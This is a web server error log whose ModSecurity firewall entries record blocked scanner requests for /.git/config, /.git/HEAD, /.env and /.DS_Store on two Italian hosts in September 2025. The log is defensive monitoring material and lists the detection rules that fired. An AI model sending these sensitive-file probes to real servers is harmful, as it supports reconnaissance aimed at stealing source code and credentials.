[Mon Sep 15 05:06:10.327137 2025] [:error] [pid 2740974] [client 216.81.248.61:46654] [client 216.81.248.61] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMeCoufuR7R5lxgsJTdfxgAAAAM"]
[Mon Sep 15 05:06:10.327412 2025] [:error] [pid 2740974] [client 216.81.248.61:46654] [client 216.81.248.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMeCoufuR7R5lxgsJTdfxgAAAAM"]
[Mon Sep 15 05:06:10.327557 2025] [:error] [pid 2740974] [client 216.81.248.61:46654] [client 216.81.248.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMeCoufuR7R5lxgsJTdfxgAAAAM"]
[Mon Sep 15 07:20:01.983776 2025] [:error] [pid 2746101] [client 5.189.174.31:34706] [client 5.189.174.31] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aMeiAWM8Pi7ovH_POObLsgAAAAQ"]
[Mon Sep 15 07:20:01.984011 2025] [:error] [pid 2746101] [client 5.189.174.31:34706] [client 5.189.174.31] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aMeiAWM8Pi7ovH_POObLsgAAAAQ"]
[Mon Sep 15 07:20:01.984161 2025] [:error] [pid 2746101] [client 5.189.174.31:34706] [client 5.189.174.31] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aMeiAWM8Pi7ovH_POObLsgAAAAQ"]
[Mon Sep 15 07:20:02.057533 2025] [:error] [pid 2740974] [client 5.189.174.31:34722] [client 5.189.174.31] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMeiAufuR7R5lxgsJTdgBgAAAAM"]
[Mon Sep 15 07:20:02.057745 2025] [:error] [pid 2740974] [client 5.189.174.31:34722] [client 5.189.174.31] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMeiAufuR7R5lxgsJTdgBgAAAAM"]
[Mon Sep 15 07:20:02.057926 2025] [:error] [pid 2740974] [client 5.189.174.31:34722] [client 5.189.174.31] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMeiAufuR7R5lxgsJTdgBgAAAAM"]
[Mon Sep 15 18:48:42.568040 2025] [:error] [pid 2757518] [client 45.130.203.214:41629] [client 45.130.203.214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMhDauMLkh1b0MSIZzcb6QAAAAM"]
[Mon Sep 15 18:48:42.568306 2025] [:error] [pid 2757518] [client 45.130.203.214:41629] [client 45.130.203.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMhDauMLkh1b0MSIZzcb6QAAAAM"]
[Mon Sep 15 18:48:42.568468 2025] [:error] [pid 2757518] [client 45.130.203.214:41629] [client 45.130.203.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMhDauMLkh1b0MSIZzcb6QAAAAM"]
[Tue Sep 16 00:44:26.423498 2025] [:error] [pid 2764600] [client 45.130.203.195:28645] [client 45.130.203.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMiWylv9MZmR9sprSknk1wAAAAE"]
[Tue Sep 16 00:44:26.423731 2025] [:error] [pid 2764600] [client 45.130.203.195:28645] [client 45.130.203.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMiWylv9MZmR9sprSknk1wAAAAE"]
[Tue Sep 16 00:44:26.423889 2025] [:error] [pid 2764600] [client 45.130.203.195:28645] [client 45.130.203.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMiWylv9MZmR9sprSknk1wAAAAE"]
[Tue Sep 16 00:44:26.528834 2025] [:error] [pid 2764602] [client 45.130.203.191:63559] [client 45.130.203.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMiWyq00SCSXfD2O4FOvQQAAAAU"]
[Tue Sep 16 00:44:26.529068 2025] [:error] [pid 2764602] [client 45.130.203.191:63559] [client 45.130.203.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMiWyq00SCSXfD2O4FOvQQAAAAU"]
[Tue Sep 16 00:44:26.529220 2025] [:error] [pid 2764602] [client 45.130.203.191:63559] [client 45.130.203.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMiWyq00SCSXfD2O4FOvQQAAAAU"]
[Tue Sep 16 18:04:07.147521 2025] [:error] [pid 2782433] [client 44.200.14.106:42560] [client 44.200.14.106] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMmKd_XgQANlaXf6u5oUXgAAAA0"]
[Tue Sep 16 18:04:07.147899 2025] [:error] [pid 2782433] [client 44.200.14.106:42560] [client 44.200.14.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMmKd_XgQANlaXf6u5oUXgAAAA0"]
[Tue Sep 16 18:04:07.148073 2025] [:error] [pid 2782433] [client 44.200.14.106:42560] [client 44.200.14.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMmKd_XgQANlaXf6u5oUXgAAAA0"]
[Wed Sep 17 00:19:37.581779 2025] [authz_core:error] [pid 2788773] [client 142.93.129.190:54766] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Sep 17 00:19:37.942518 2025] [:error] [pid 2788733] [client 142.93.129.190:54800] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aMniefn_5VFDFAyyM8ERwQAAAAQ"]
[Wed Sep 17 00:19:37.942743 2025] [:error] [pid 2788733] [client 142.93.129.190:54800] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aMniefn_5VFDFAyyM8ERwQAAAAQ"]
[Wed Sep 17 00:19:37.942890 2025] [:error] [pid 2788733] [client 142.93.129.190:54800] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aMniefn_5VFDFAyyM8ERwQAAAAQ"]
[Wed Sep 17 00:19:38.029784 2025] [:error] [pid 2788736] [client 142.93.129.190:54810] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMniepyykk55rC3W4DgoBgAAAA8"]
[Wed Sep 17 00:19:38.029994 2025] [:error] [pid 2788736] [client 142.93.129.190:54810] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMniepyykk55rC3W4DgoBgAAAA8"]
[Wed Sep 17 00:19:38.030201 2025] [:error] [pid 2788736] [client 142.93.129.190:54810] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMniepyykk55rC3W4DgoBgAAAA8"]
[Wed Sep 17 00:19:38.111873 2025] [:error] [pid 2788734] [client 142.93.129.190:54818] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMniejyvc9sYjSQOUOtOSAAAAAI"]
[Wed Sep 17 00:19:38.112084 2025] [:error] [pid 2788734] [client 142.93.129.190:54818] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMniejyvc9sYjSQOUOtOSAAAAAI"]
[Wed Sep 17 00:19:38.112239 2025] [:error] [pid 2788734] [client 142.93.129.190:54818] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMniejyvc9sYjSQOUOtOSAAAAAI"]
[Wed Sep 17 23:05:35.231806 2025] [:error] [pid 2806725] [client 68.183.231.190:51914] [client 68.183.231.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMsin9bkZ3naEUewhTHeCwAAAAY"]
[Wed Sep 17 23:05:35.234555 2025] [:error] [pid 2806725] [client 68.183.231.190:51914] [client 68.183.231.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMsin9bkZ3naEUewhTHeCwAAAAY"]
[Wed Sep 17 23:05:35.234771 2025] [:error] [pid 2806725] [client 68.183.231.190:51914] [client 68.183.231.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMsin9bkZ3naEUewhTHeCwAAAAY"]
[Thu Sep 18 07:25:13.863807 2025] [:error] [pid 2817714] [client 213.209.157.244:45994] [client 213.209.157.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMuXuUEqhJdifkJzs6wSAAAAAAk"]
[Thu Sep 18 07:25:13.864076 2025] [:error] [pid 2817714] [client 213.209.157.244:45994] [client 213.209.157.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMuXuUEqhJdifkJzs6wSAAAAAAk"]
[Thu Sep 18 07:25:13.864237 2025] [:error] [pid 2817714] [client 213.209.157.244:45994] [client 213.209.157.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMuXuUEqhJdifkJzs6wSAAAAAAk"]
[Thu Sep 18 07:55:33.096481 2025] [:error] [pid 2817716] [client 213.209.157.232:32978] [client 213.209.157.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMue1UmNKl3bwYEgbrVx0wAAAAs"]
[Thu Sep 18 07:55:33.096753 2025] [:error] [pid 2817716] [client 213.209.157.232:32978] [client 213.209.157.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMue1UmNKl3bwYEgbrVx0wAAAAs"]
[Thu Sep 18 07:55:33.096945 2025] [:error] [pid 2817716] [client 213.209.157.232:32978] [client 213.209.157.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMue1UmNKl3bwYEgbrVx0wAAAAs"]
[Thu Sep 18 13:47:31.658612 2025] [:error] [pid 2817645] [client 45.148.10.246:34566] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMvxU_cKhnzc8_MgaByIrwAAAAE"]
